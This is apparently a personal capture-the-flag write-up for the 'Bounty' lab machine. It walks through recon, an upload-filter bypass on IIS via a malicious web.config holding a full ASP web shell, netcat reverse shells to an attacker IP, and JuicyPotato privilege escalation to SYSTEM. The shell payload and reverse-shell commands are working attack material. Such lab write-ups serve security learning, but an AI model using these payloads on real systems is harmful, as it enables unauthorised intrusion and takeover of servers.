# Recon
## NMAP
```txt
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

```

## Web
- IIS 7.5
- Retrieved x-aspnet-version header: 2.0.50727
- No exploit found that can be leveraged into RCE

### Gobuster
```txt
/aspnet_client        (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/..aspx               (Status: 400) [Size: 11]                                         
/.                    (Status: 200) [Size: 630]                                        
/transfer.aspx        (Status: 200) [Size: 941]                                        
/uploadedfiles        (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]
/.html..aspx          (Status: 400) [Size: 11]
```
- `transfer.aspx` allows us to upload files.
- Attempting to upload an `.aspx ` fails.

# Exploit
- We also can't upload a `.txt` file.
- But uploading a jpg works! So it's expecting a picture.
- Uploading a `.txt` file but naming to `.jpg` works so it looks like it's not checking the magic bytes but checking the file extension.
- Trying other extensions for ASP and we get a success on `.config`!
- I found this exploit explaining on [how to achieve RCE with .config](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
```
- If we check for the file at `/uploadedfiles/web.config` it should return 3 since we're doing 1+2
- The server deletes the file after some minute so we have to do this fast.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>
```
- Simple web shell.
- We get a shell as user `merlin`, but the shell is not that stable.

# Post-Exploit
- user.txt was hidden
`attrib -s -h -r /s *.*` to show hidden files
- Get a reverse shell from the unstable shell. 
```sh
copy \\10.10.17.239\exploit\nc.exe
C:\Users\merlin\Desktop\nc.exe -e cmd.exe 10.10.17.239 9009
```
```sh
C:\Users\merlin\Desktop> whoami
bounty\merlin 
```
- Check privileges.
```txt
PRIVILEGES INFORMATION                                                                                                                                                                                                                        
----------------------                                                                                                                                                                                                                        
                                                                                                                                                                                                                                              
Privilege Name                Description                               State                                                                                                                                                                 
============================= ========================================= ========                                                                                                                                                              
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled                                                                                                                                                              
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled                                                                                                                                                              
SeAuditPrivilege              Generate security audits                  Disabled                                                                                                                                                              
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled                                                                                                                                                               
SeImpersonatePrivilege        Impersonate a client after authentication Enabled                                                                                                                                                               
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled 
```
- Check systeminfo
```txt
Host Name:                 BOUNTY                                                                                                                                                                                                             
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter                                                                                                                                                                        
```
## Privilege Escalation
- We can use `windows-exploit-suggester.py` to find exploits.
```txt
──(user㉿kali)-[~/ctf/bounty]                                                                                                                                                                                                                
└─$ python2 /opt/scripts/windows/windows-exploit-suggester.py -d 2022-02-16-mssb.xls -i systeminfo                                                                                                                                            
[*] initiating winsploit version 3.3...                                                                                                                                                                                                       
[*] database file detected as xls or xlsx based on extension                                                                                                                                                                                  
[-] no such file or directory '2022-02-16-mssb.xls'. ensure you have the correct database file passed in --database/-d                                                                                                                        
                                                                                                                                                                                                                                              
┌──(user㉿kali)-[~/ctf/bounty]                                                                                                                                                                                                                
└─$ python2 /opt/scripts/windows/windows-exploit-suggester.py -d ../grandpa/2022-02-16-mssb.xls -i systeminfo     1 ⨯                                                                                                                         
[*] initiating winsploit version 3.3...                                                                                                                                                                                                       
[*] database file detected as xls or xlsx based on extension                                                                                                                                                                                  
[*] attempting to read from the systeminfo input file                                                                                                                                                                                         
[+] systeminfo input file read successfully (ascii)                                                                                                                                                                                           
[*] querying database file for potential vulnerabilities                                                                                                                                                                                      
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits                                                                                                                                   
[*] there are now 197 remaining vulns                                                                                                                                                                                                         
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin                                                                                                                                                                            
[+] windows version identified as 'Windows 2008 R2 64-bit'                                                                                                                                                                                    
[*]                                                                                                                                                                                                                                           
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical                                                                                                                                                           
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important                                                                                                                            
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical                                                                                                                                                           
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC                                                                                                                      
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC                                                                                                   
[*]                                                                                                                                                                                                                                           
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important                                                                                                                                      
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important                                                                                                                          
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (234q7290) - Critical                                                                                                                                   
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important                                                                                                                     
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important                                                                                                                                       
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical                                                                                                                                                            
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical                                                                                                                                                            
[*] done                                                                 
```
- `MS13-005` was interesting but I couldn't find any compiled exploits.
- We still have SeImpersonate which is enabled. We can churrasco or juicypotato.
```txt
c.exe -d "C:\Users\merlin\Desktop\nc.exe -e cmd.exe 10.10.17.239 9002"                                                                                                                                                                        
/churrasco/-->Current User: merlin                                                                                                                                                                                                            
/churrasco/-->Process is not running under NETWORK SERVICE account!                                                                                                                                                                           
/churrasco/-->Getting NETWORK SERVICE token ...                                                                                                                                                                                               
```
- Churrasco failed since we're not running under the NETWORK SERVICE account.
- We can try JuicyPotato.
```txt
JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\merlin\desktop\nc.exe -e cmd.exe 10.10.17.239 1337" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
                                                                                                                                                                                             
```
- So we are basically executing a command and getting a reverse shell on port 1337
```txt
C:\Windows\system32\cmd.exe > whoami                                                     
nt authority\system 
```
- We are now SYSTEM.